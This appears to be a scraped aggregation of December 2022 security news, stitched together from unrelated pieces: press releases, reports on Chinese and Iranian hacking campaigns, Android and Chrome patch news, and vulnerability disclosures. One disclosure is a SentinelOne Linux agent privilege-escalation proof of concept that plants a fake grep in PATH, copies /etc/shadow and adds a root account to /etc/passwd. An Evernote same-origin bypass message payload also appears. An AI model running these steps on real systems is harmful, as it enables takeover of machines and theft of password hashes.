Data protection company Piiano officially launches a vault for sensitive customer data, the first among a suite of privacy tools for developers.

**TEL AVIV, Israel, Dec. 07, 2022 (GLOBE NEWSWIRE)** — Piiano, a data protection company co-founded by celebrated security experts Gil Dabah, CEO and Ariel Shiftan, CTO, today announced the release of the Piiano Vault, a secure database for enterprises to safely store and use sensitive personal data and comply with evolving privacy regulations. Basic functionality is now available for free. Deployed directly in an enterprise’s own cloud environment, the Vault provides complete control over critical customer data and was designed to be the most secure database on the market.

Enterprises that collect sensitive data face mounting pressure to protect it and maintain customer privacy in the wake of high-profile data leaks and broadening regulations. Gartner findings demonstrate intensifying budgetary spending across data privacy and security by 14.2% and 16.9%, respectively. According to a survey conducted by Piiano on privacy best practices, 80% of companies now attempt to treat sensitive data differently, with 45% highly prioritizing Personal Identifiable Information (PII) protection.

However, operationalizing such practices at scale requires the involvement of developers tasked with embedding security into the very frameworks of their enterprise environments. This is an enormous undertaking, and many developers find themselves scrambling to retrofit privacy and security into existing environments and workflows. In most cases, such a feat requires companies to embark on a years-long, expensive development project even as the underlying risk grows and becomes a moving target. By contrast, Piiano intends to significantly accelerate such transformations and deliver unprecedented ROI on related initiatives.

As enterprise R&D outpaces security efforts, the safety and protection of customer data remains disorganized and consequently highly vulnerable to potential breaches. Piiano’s solution is based on embedding security and de-identifying data as part of product development. The company’s approach starts by isolating customer secrets and similar types of sensitive data in a separate, zero-trust vault. It is a best practice already exercised by large companies like Google, Netflix, USAA and JPMC. Both Dabah and Shiftan assert that keeping sensitive data separate and untouchable can all but nullify the true privacy risk.

“By centralizing sensitive data into one place with Piiano, developers can easily integrate with existing building blocks like field-level encryption, tokenization, masking, data retention and granular access control. Even more exciting are the major breakthroughs we’ve made in providing capabilities to search through encrypted data,” says Shiftan. “In this way, the Piiano Vault simplifies regulatory compliance by providing developers with out-of-the-box support for staples of GDPR and CCPA requirements, such as data subject access rights, consent, retention, minimization, traceability and more.”

In praise of Piiano’s approach, author of "Data Privacy: A Runbook for Engineers" and Piiano board advisor Nishant Bhajaria said, “Gil and Ariel’s groundbreaking technology has the potential to be an incredible service to enterprises in an age where the sale of stolen sensitive customer data has become so widespread and lucrative. I commend them for helping companies seamlessly incorporate privacy into day-to-day operations.”

For more information visit: https://piiano.com/pii-data-privacy-vault/

**About Piiano**

Piiano provides developer infrastructure to protect customer secrets and ensure their privacy — even in the event of a breach. Safely use and store sensitive data in our Vault and leverage our Scanner to quickly identify PII usages across source code for full visibility into your privacy issues. With Piiano’s building blocks, engineers and security leaders can save time, effort and resources while achieving secure and compliant applications.

Piiano Equips Developers to Stop Sensitive Data Breaches

SentinelOne sentinelagent version 22.3.2.5 on Linux suffers from a privilege escalation vulnerability due to not use a fully qualified path when calling grep.

Exploit Title: SentinelOne sentinelagent (linux) root Privilege Escalation zero day vulnerability  
Date: 12/06/2022  
Exploit Author: ouch_this_hurts  
Vendor Homepage: https://www.sentinelone.com/  
Software Link: https://assets.sentinelone.com/prod/s1-linux-agent-datas  
Version: 22.3.2.5  
Tested on: Ubuntu 22.04.x  
CVE: NA

Not enough AI in the world can help you write secure software it seems? The vendor doesnt make reporting vulnerabilities easy, so to exploit-db it goes :)

Protips:  
- If I Google you, and I cannot find an easy way to report the vulnerability, I'm not going to bother.  
- If you require me to use HackerOne, I'm not going to bother.  
- If you dont have a security.txt, how do you expect me to contact you?

Get `root` on a system with `sentinelagent<=22.3.2.5` with one simple trick:

Override `grep` in the `PATH` with your malicious code. Reboot. pwnd. Nice!

PoC below:  
1. Find the systems "earliest" `PATH`, or just override it to whatever you want in `/etc/environment` with some other staged exploit.  
2. Create the following `grep` file in that directory and make sure its executable:

    ```shell  
    cat << SENTINELOOPS > /usr/local/bin/grep  
    #!/bin/bash  
    # I think I'll have the passwds pl0x  
    cat /etc/shadow > /tmp/etc_shadow

    # password is password :)  
    echo 'sentinel_oops:\$1\$user1\$WuzQ29wbcMN09VLW7X0/q1:0:0::/root:/bin/sh' >> /etc/passwd  
    SENTINELOOPS

    chmod +x /usr/local/bin/grep  
    ```

3. Wait for machine to reboot, login as `sentinel_oops:password` :)

    ```  
    $ su sentinel_oops  
    Password:   
    # whoami   
    root  
    ```

What actually happened here? On `sentinelagent` start it runs `sh -c "grep...."`.

So there are potentially other ways of privilege escalation via this "agent"?  
- `grep` as demonstrated above  
- `pgrep` examining the binary appears to be vulnerable  
- `xargs` examining the binary appears to be vulnerable  
- `cat` examining the binary appears to be vulnerable  
- `pgrep` examining the binary appears to be vulnerable  
- `ldd` examining the binary appears to be vulnerable  
- `lsmod` examining the binary appears to be vulnerable  
- `mksh` examining the binary appears to be vulnerable  
- `awk` examining the binary appears to be vulnerable

[CWE-427](https://cwe.mitre.org/data/definitions/427.html) and [how to write secure software](https://youtu.be/RfiQYRn7fBg?t=16)

SentinelOne sentinelagent 22.3.2.5 Privilege Escalation

The China-linked nation-state hacking group referred to as Mustang Panda is using lures related to the ongoing Russo-Ukrainian War to attack entities in Europe and the Asia Pacific.
That's according to the BlackBerry Research and Intelligence Team, which analyzed a RAR archive file titled "Political Guidance for the new EU approach towards Russia.rar." Some of the targeted countries include

Spear Phishing / Cyber Espionage

The China-linked nation-state hacking group referred to as **Mustang Panda** is using lures related to the ongoing Russo-Ukrainian War to attack entities in Europe and the Asia Pacific.

That's according to the BlackBerry Research and Intelligence Team, which analyzed a RAR archive file titled "Political Guidance for the new EU approach towards Russia.rar." Some of the targeted countries include Vietnam, India, Pakistan, Kenya, Turkey, Italy, and Brazil.

Mustang Panda is a prolific cyber-espionage group from China that's also tracked under the names Bronze President, Earth Preta, HoneyMyte, RedDelta, and Red Lich.

It's believed to be active since at least July 2018, per Secureworks' threat profile, although indications are that the threat actor has been targeting entities worldwide as early as 2012.

Mustang Panda is known to heavily rely on sending weaponized attachments via phishing emails to achieve initial infection, with the intrusions eventually leading to the deployment of the PlugX remote access trojan.

However, recent spear-phishing attacks undertaken by the group targeting government, education, and research sectors in the Asia Pacific region have involved custom malware like PUBLOAD, TONEINS, and TONESHELL, suggesting an expansion to its malware arsenal.

The latest findings from BlackBerry show that the core infection process has remained more or less the same, even as Mustang Panda continues to utilize geopolitical events to their advantage, echoing prior reports from Google and Proofpoint.

Contained within the decoy archive is a shortcut to a Microsoft Word file, which leverages DLL side-loading – a technique that was also employed in attacks aimed at Myanmar earlier this year – to kick off the execution of PlugX in memory, before displaying the document's contents.

"Their attack chain remains consistent with the continued use of archive files, shortcut files, malicious loaders, and the use of the PlugX malware, although their delivery setup is usually customized per region/country to lure victims into executing their payloads in the hope of establishing persistence with the intent of espionage," BlackBerry's Dmitry Bestuzhev told The Hacker News.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Chinese Hackers Using Russo-Ukrainian War Decoys to Target APAC and European Entities

Categories: Android
Categories: Exploits and vulnerabilities
Categories: News
Google has issued its December round of patches, which includes a fix for a critical vulnerability that allows RCE over Bluetooth



(Read more...)




The post Update now! Google patches Android vulnerability that allows remote code execution over Bluetooth appeared first on Malwarebytes Labs.

In the Android security bulletin of December 5, 2022 you can find an overview of the security vulnerabilities affecting Android devices that are fixed in patch level 2022-12-05 or later.

The most severe of these issues is a critical security vulnerability in the System component that could lead to remote code execution over Bluetooth with no additional execution privileges needed.

**Mitigation**

If your Android phone is at patch level 2022-12-05 or later then the issues discussed below have been fixed. The updates have been made available for Android 10, 11, 12, 12L and 13.

You can find your device's Android version number, security update level, and Google Play system level in your Settings app. You'll get notifications when updates are available for you, but you can also check for updates.

For most phones it works like this: Under **About phone** or **About device** you can tap on **Software updates** to check if there are new updates available for your device, although there may be slight differences based on the brand, type, and Android version of your device.

**Vulnerabilities**

The total number of patched issues is 81, and four of them are security issues labelled as critical.

Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). Below are details for the four critical ones.

CVE-2022-20472: a critical remote code execution (RCE) vulnerability in the Framework component.

CVE-2022-20473: another critical RCE vulnerability in the Framework component.

The Android framework consists of a group of Java classes, interfaces, and other precompiled code upon which apps are built.

CVE-2022-20498: a critical information disclosure (ID) vulnerability in the System component.

CVE-2022-20411: a critical RCE vulnerability in the System component. Exploiting this vulnerability could allow an attacker to perform remote code execution over Bluetooth with no additional execution privileges needed.

Google didn't provide any details about the vulnerabilities in order to protect the Android users that haven’t been able to patch yet.

**Patch gap**

Depending on the manufacturer of your Android device, the patch may not available to you yet.

There is a patch gap that exists when software patches have to wait for a second vendor to incorporate them into their software before they reach an end user.

This has always been a particularly acute problem on Android phones. If there is an update for the Android operating system—software that sits at the core of about 70% of all mobile devices—it can take a very long time to reach end users. This is because many mobile phone vendors sell their devices with their own tweaked versions of Android and any fix has to be tested in that slightly different environment.

We know that Samsung has issued the patch including a fix for CVE-2022-20411 and the other critical vulnerabilities.

Stay safe, everyone!

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Update now! Google patches Android vulnerability that allows remote code execution over Bluetooth

Software firms and the National Security Agency urge developers to move to memory-safe programming languages to eliminate a major source of high-severity flaws.

The software industry is making headway against a group of pernicious vulnerabilities that are responsible for the vast majority of critical, remotely exploitable, and in-the-wild attacks, software-security experts said this week.

The class of vulnerabilities — so-called memory-safety issues — include buffer overflows and use-after-free errors and have accounted for the majority of application security issues disclosed by software companies. Now, the latest data show that the increasing use of memory-safe languages — such as Java, C#, and more recently, Rust — has resulted in a rapid decline of the entire class of vulnerabilities.

Last week, for example, Google revealed that the latest version of the Android operating system has more new code written in memory-safe programing languages — such as Java, Rust, and Kotlin — than memory-unsafe languages such as C and C++, resulting in a drop in memory-safety vulnerabilities from 223 to 85 over the past three years.

"We are continuing to focus on eliminating entire classes of vulnerabilities, focusing on the most severe first," says Jeffrey Vander Stoep, a software engineer at Google. "As memory safety vulnerabilities become more scarce, we anticipate the research community to focus their vulnerability-findings efforts on other classes of vulnerabilities."

    

Memory-safety vulnerabilities are disproportionately severe. Source: Google

For decades, C and C++ have been the workhorse programming languages of the software industry. Yet they lack the memory protections of more modern languages, such as C#, Go, Java, Python, Ruby, Rust, and Swift. The result? Fifty-nine percent of applications written in C++ have high-severity or critical-severity flaws, compared to 9% for JavaScript and 10% for Python, according to application-security firm Veracode's State of Software Security Vol. 11 report.

**Buffer Overflows and Wormable Flaws**

The ease with which programmers can create flawed code has become a major problem for large software companies. Microsoft, for example, found that, up until 2018, memory-safety issues accounted for 70% of the vulnerabilities discovered in the company's software. Overall, memory safety issues have accounted for 60% to 70% of all vulnerabilities across a wide variety of ecosystems, according to 2020 research by software resilience engineer Alex Gaynor.

And because the flaws can easily be exploited to attack applications, they are the root causes behind a significant number of compromises, says Chris Wysopal, chief technology officer of Veracode.

"Memory corruption issues are amongst the highest severity flaws as they often allow attackers to exploit with code execution which allows them to take complete control of the application," he says. "In the worst case scenario this allows the creation of a worm exploit which can go on to attack other instances of the vulnerability."

In its recent blog post on its shift to memory-safe languages for Android development, Google noted that while memory-safety vulnerabilities now only account for 36% of issues disclosed in Android, they account for 86% of the critical security vulnerabilities and 89% of remotely exploitable issues.

**Making the Switch to Safe Languages**

For that reason, Google and others have urged developers to adopt memory-safe languages.

In Google's case, C and C++ now account for just less than half of all new code. In fact, Android 13, the latest version, is the first where the majority of code has been written in memory-safe languages, with Rust replacing C and C++ for many developers. Rust is an efficient programming language focused on creating secure code.

Even the National Security Agency is urging companies to adopt memory-safe programming languages.

Switching to a memory-safe language is not sufficient, however. While the languages do make it harder for programmers to write insecure code, every language has a different level of protection. For that reason, the NSA has also recommended that developers use a variety of application-security tools — from compiler options to static scanners to runtime analysis — to harden applications as much as possible.

"Software analysis tools can detect many instances of memory management issues and operating environment options can also provide some protection, but inherent protections offered by memory safe software languages can prevent or mitigate most memory management issues," the NSA's report stated.

In the end, while memory-safe programming languages are not a standalone solution to the problem of software vulnerabilities, they give guidance to developers who can then avoid some of the most severe programming errors, says Veracode's Wysopal.

"It's hard to generalize and say that there is a lower volume of vulnerabilities in memory safe languages since the way they are used is different," he says. "But if you were using two different languages to accomplish the exact same task, and one was memory safe, you'd expect fewer vulnerabilities in that one and typically less critical vulnerabilities."

Shift to Memory-Safe Languages Gains Momentum

CISA gives agencies deadline to patch against Google Chrome bug being actively exploited in the wild.

Although details about its real-world impact are vague, the Cybersecurity and Infrastructure Security Agency (CISA) added a Google Chrome flaw to its list of Known Exploited Vulnerabilities Catalog.

Google has already released a fixed version of Chrome browser for Windows, Mac, and Linux users. CISA has given government agencies until Dec. 26 to get a patch in place.

Tracked under CVE-2022-4262, CISA described the Google Chrome V8 Engine flaw as a "type confusion vulnerability." Attackers can exploit this kind of vulnerability by using a specially crafted HTML page to corrupt the heap and crashing the browser. Attackers can also exploit type confusion flaws to execute arbitrary code. An exploit for CVE-2022-4262 already exists in the wild, according to Google.

"Specific impacts from exploitation are not available at this time," CISA added.

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Google Chrome Flaw Added to CISA Patch List

AutoTaxi Stand Management System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the component search.php.

**Auto/Taxi Stand Management System using PHP and MySQL**

“Auto/Taxi Stand Management System” is a web-based technology that will manage the records of the incoming and outgoing autos and taxis in a parking stand. It’s an easy for Admin to retrieve the data if the auto and taxi has been visited through the number he can get that data“Auto/Taxi Stand Management Project in PHP”  is an automatic system that delivers data processing in very high speed in a systematic manner.

**Project Requirements**

Project Name

Auto/Taxi Stand Management System Project (Using PHP & MYSQLi)

Language Used

PHP5.6, PHP7.x

Database

MySQL 5.x

User Interface Design

HTML, AJAX,JQUERY,JAVASCRIPT

Web Browser

Mozilla, Google Chrome, IE8, OPERA

Software

XAMPP / Wamp / Mamp/ Lamp (anyone)

**Project Modules**

In “Auto/Taxi Stand Management System project”  we use PHP and MySQL database. This is the project which keeps records of the auto and taxi which is going to park in the stand. “Auto/Taxi Stand Management System”  have module i.e., admin and user.

**User**

User can only view the Auto/Taxi stand recipient by using their name and mobile number. number.

**Admin**

**Dashboard**: In this sections, the admin can briefly view the number of auto and taxi entries in a particular period.

**New Auto/Taxi Entry**: In this section, admin add auto and taxi which is going into the stand.

**Manage Auto/Taxi Entry**: In this section, admin can manage incoming and outgoing auto and taxi and the admin can also add parking charges and his/her remarks.

**Reports**: In this section admin can generate auto and taxi entry reports between two dates.

Admin can also update his profile, change the password and recover the password.

****Some of the Project Screens****

**Admin Login**

**Admin Dashboard**

**Auto/Taxi Stand Entry Form**

**Auto/Taxi Stand Receipt**

**How to run the Auto/Taxi Stand Management System Project Using PHP and M**ySQL****

1\. Download the zip file

2\. Extract the file and copy atsms  folder

3.Paste inside root directory(for xampp xampp/htdocs, for wamp wamp/www, for lamp var/www/HTML)

4.Open PHPMyAdmin (http://localhost/phpmyadmin)

5\. Create a database with the name atsmsdb

6\. Import atsmsdb.sql file(given inside the zip package in the SQL file folder)

7\. Run the script http://localhost/atsms

**Credential for admin panel :**  
Username: admin  
Password: Test@123

**View Demo**

**Download Project Source Code**

**Project Report**

Anuj Kumar

Hi! I am Anuj Kumar, a professional web developer with 5+ years of experience in this sector. I found PHPGurukul in September 2015. My keen interest in technology and sharing knowledge with others became the main reason for starting PHPGurukul. My basic aim is to offer all web development tutorials like PHP, PDO, jQuery, PHP oops, MySQL, etc. Apart from the tutorials, we also offer you PHP Projects, and we have around 100+ PHP Projects for you.

CVE-2022-43369: Auto/Taxi Stand Management System Project in PHP | Auto Stand Management Project

Evernote Web Clipper suffered from a same-origin policy bypass vulnerability. The link to the demo exploit was a 403 at the time of addition and has not been included in this post.

    evernote: extension allows cross-origin iframe communicationI happened to notice that the Evernote Web Clipper (3,000,000+ users) allows any website to bypass the same origin policy.https://chrome.google.com/webstore/detail/evernote-web-clipper/pioclpoplcdbaefihamjohnefbikjilcIf you send a message like window.postMessage({type: \"EN_request\", name: \"EN_SerializeTo\", data: { frameName: id }), the frame DOM is collected and then posted back to the top window.I made a quick demo exploit: https://lock.cmpxchg8b.com/oov6Wahv.htmlI notice the evernote website requests that all vulnerabilities are submitted via HackerOne, but I'm unwilling to do that.https://evernote.com/security/report-issueI'll send a report to the Chrome Webstore policy team instead, who can handle contacting the registered developer.Found by: taviso@google.com

Evernote Web Clipper Same-Origin Policy Bypass

Hackers with ties to the Iranian government have been linked to an ongoing social engineering and credential phishing campaign directed against human rights activists, journalists, researchers, academics, diplomats, and politicians working in the Middle East.
At least 20 individuals are believed to have been targeted, Human Rights Watch (HRW) said in a report published Monday, attributing the

Privacy / Threat Intelligence

Hackers with ties to the Iranian government have been linked to an ongoing social engineering and credential phishing campaign directed against human rights activists, journalists, researchers, academics, diplomats, and politicians working in the Middle East.

At least 20 individuals are believed to have been targeted, Human Rights Watch (HRW) said in a report published Monday, attributing the malicious activity to an adversarial collective tracked as APT42, which is known to share overlaps with Charming Kitten (aka APT35 or Phosphorus).

The campaign resulted in the compromise of email and other sensitive data belonging to three of the targets. This included a correspondent for a major U.S. newspaper, a women's rights defender based in the Gulf region, and Nicholas Noe, a Lebanon-based advocacy consultant for Refugees International.

The digital break-in entailed gaining access to their emails, cloud storage, calendars, and contacts, as well as exfiltrating the entire data associated with their Google accounts in the form of archive files through Google Takeout.

"Iran's state-backed hackers are aggressively using sophisticated social engineering and credential harvesting tactics to access sensitive information and contacts held by Middle East-focused researchers and civil society groups," Abir Ghattas, information security director at Human Rights Watch, said.

The infection chain commences with the targets receiving suspicious messages on WhatsApp under the pretext of inviting them to a conference and luring the victims into clicking a rogue URL that captured their Microsoft, Google, and Yahoo! login credentials.

These phishing pages are also capable of orchestrating adversary-in-the-middle (AiTM) attacks, thereby making it possible to breach accounts that are secured by two-factor authentication (2FA) other than a hardware security key.

15 of the targeted high-profile individuals are confirmed to have received the same WhatsApp messages between September 15 and November 25, 2022, the international non-governmental organization said.

HRW further pointed out inadequacies in Google's security protections, as the victims of the phishing attack "did not realize their Gmail accounts had been compromised or a Google Takeout had been initiated, in part because the security warnings under Google's account activity do not push or display any permanent notification in a user's inbox or send a push message to the Gmail app on their phone."

The option to request data from Google Takeout lines up with a .NET-based program called HYPERSCRAPE that was first documented by Google's Threat Analysis Group (TAG) earlier this August, although HRW said it could not confirm if the tool was indeed employed in this specific incident.

The attribution to APT42 is based on overlaps in the source code of the phishing page with that of another spoofed registration page that, in turn, was associated to a credential theft attack mounted by an Iran-nexus actor (aka TAG-56) against an unnamed U.S. think tank.

"The threat activity is highly likely indicative of a broader campaign that makes use of URL shorteners to direct victims to malicious pages where credentials are stolen," Recorded Future disclosed late last month. "This tradecraft is common among Iran-nexus advanced persistent threat (APT) groups like APT42 and Phosphorus."

What's more, the same code has been connected to another domain utilized as part of a social engineering attack attributed to the Charming Kitten group and disrupted by Google TAG in October 2021.

It's worth pointing out that despite APT35 and APT42's links to Iran's Islamic Revolutionary Guard Corps (IRGC), the latter is geared more towards individuals and entities for "domestic politics, foreign policy, and regime stability purposes," per Mandiant.

"In a Middle East region rife with surveillance threats for activists, it's essential for digital security researchers to not only publish and promote findings, but also prioritize the protection of the region's embattled activists, journalists, and civil society leaders," Ghattas said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Iranian State Hackers Targeting Key Figures in Activism, Journalism, and Politics

Organizations of all sizes can now protect their cloud-native applications easily and cost-effectively across containers and all other cloud assets.

**RIDGEFIELD PARK, N.J., Dec. 6, 2022 (GLOBE NEWSWIRE) —** AlgoSec, a global cybersecurity leader in securing application connectivity, announced today that it has acquired Prevasio, a SaaS cloud-native application protection platform (CNAPP) that includes an agentless cloud security posture management (CSPM) platform, anti-malware scan, vulnerability assessment and dynamic analysis for containers.

As applications rapidly migrate to the Cloud, security teams are being flooded with alerts. These teams are struggling to detect and prioritize risks through Cloud providers’ native security controls, especially in multi-cloud environments. Furthermore, security teams are hard-pressed to find solutions that meet their budgetary restrictions.

To answer this need, AlgoSec will offer the Prevasio solution at aggressive pricing to new customers, as well as the existing 1,800 blue chip enterprise organizations they currently serve, allowing them to reduce their cloud security costs.

Prevasio’s user-friendly, cost-effective SaaS solution is designed for hardening security posture across all cloud assets, including containers. The solution provides increased visibility into security issues and compliance gaps, enabling the cloud operations and security teams to prioritize risks and comply with CIS benchmarks.

Prevasio customers have successfully reduced administration time and achieved operational cost reductions, even across small teams, within days of operationalization.

Leveraging patented technology developed by Stanford Research Institute International® (SRI), one of the world’s largest research institutes and the developer of SIRI and many other leading technologies, Prevasio’s key capabilities include:

*   Analysis of all assets across AWS, Azure, and Google Cloud, offering a unified view in a single pane of glass
*   Prioritized risk according to CIS benchmarks, HIPPA and PCI regulations
*   Blazing fast static- and dynamic- agentless vulnerability scanning of containers
*   Assessment and detection of cybersecurity threats
*   Instantaneous connection to AWS, Azure, or Google Cloud accounts without installation or deployment

Furthermore, AlgoSec will incorporate SRI artificial intelligence (AI) capabilities into the Prevasio solution.

“Applications are the lifeblood of organizations. As such, our customers have an urgent need to effectively secure the connectivity of those applications across cloud and hybrid estates to avoid unpleasant surprises. With Prevasio, organizations can now confidently secure their cloud-native applications to increase organizational agility and harden security posture,” said Yuval Baron, AlgoSec CEO.

**About AlgoSec** 

AlgoSec, a global cybersecurity leader, empowers organizations to secure application connectivity by automating connectivity flows and security policy, anywhere.  The AlgoSec platform enables the world’s most complex organizations to gain visibility, reduce risk, achieve compliance at the application-level and process changes at zero-touch across the hybrid network. AlgoSec’s patented application-centric view of the hybrid network enables business owners, application owners, and information security professionals to talk the same language, so organizations can deliver business applications faster while achieving a heightened security posture.  Over 1,800 of the world’s leading organizations trust AlgoSec to help secure their most critical workloads across public cloud, private cloud, containers, and on-premises networks. 

**About Prevasio**

Prevasio, an AlgoSec company, helps organizations of all sizes protect their cloud-native applications across containers and all other cloud assets.

Prevasio’s agentless cloud-native application protection platform (CNAPP) provides increased visibility into security and compliance gaps, enabling the cloud operations and security teams to prioritize risks and ensure compliance with internet security benchmarks.

Acquired by AlgoSec in 2022, Prevasio combines cloud-native security with SRI International’s proprietary AI capabilities and AlgoSec’s expertise in securing 1,800 of the world’s most complex organizations.

Tag

#google